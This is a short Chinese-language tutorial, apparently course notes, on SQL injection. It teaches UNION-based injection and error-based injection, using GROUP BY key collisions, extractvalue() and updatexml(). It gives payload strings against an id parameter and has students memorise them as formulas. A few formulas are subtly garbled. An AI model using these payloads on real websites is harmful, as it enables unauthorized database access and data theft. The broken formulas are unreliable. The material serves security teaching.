SQL注入之联合查询和报错注入

联合查询

联合查询就是利用SQL 语句union select 。
union select 会把两条SQL 语句的查询结果拼接起来，形成一张虚拟的表。联合查询会实现跨库跨表查询，会极大减少SQL 注入的成本。

联合查询有两个限制条件

1. 两条SQL 语句的查询结果具有相同的列数

2. 两条SQL 语句相同位置的列具有相同的数据类型
   联合查询通常用在数据库的内容会回显到网页上的情况，所以联合查询通常需要三步：
   1.判断当前表中字段个数
   使用使用语句[?id=1’ order by 1 --+]，order by 3 的时候页面正常，当order by 4 时，页面报错。说明当前表中存在3 个字段。
   
   2.判断显示位
   使用语句[?id=-1’ union select 1,2,3 --+]
   

   在页面中可以看到数字2 和3 ，说明显示位是2 和3。

3. 实现跨库跨表查询
   使用语句[?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+]
   

报错注入

报错注入select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()2))x from information_schema.tables group by x)a
报错注入用在数据库的错误信息会回显在网页中的情况，如果联合查询不能使用，首选报错注入。
报错注入利用的是数据库的报错信息得到数据库的内容，这里需要构造语句让数据库报错。
让数据库报错的语句有很多，原理也不尽相同，还有数据库版本的因素。本章课程推荐同学们把报错的语句当作公式记下来，进行报错注入。以下展示三种报错注入的方法
1. group by 重复键冲突
公式：[?id=1 and (select 1 from (select count(),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+]。
提交参数[?id=1’ and () --+]

2. extractvalue() 函数
公式:[?id=1 and extractvalue(1,concat(’^{’,(查询的内容),’}’))]
提交内容[?id=1’ and extractvalue(1,concat(’^’,(select version()),’^’)) --+]

3. updatexml() 函数
公式[?id=1 and updatexml(1,concat(’^{’,(查询的内容),’}’),1)] 注释：^ 16进制为0x5e
提交内容[?id=1’ and updatexml(1,concat(’^’,(select database()),’^’),1) --+]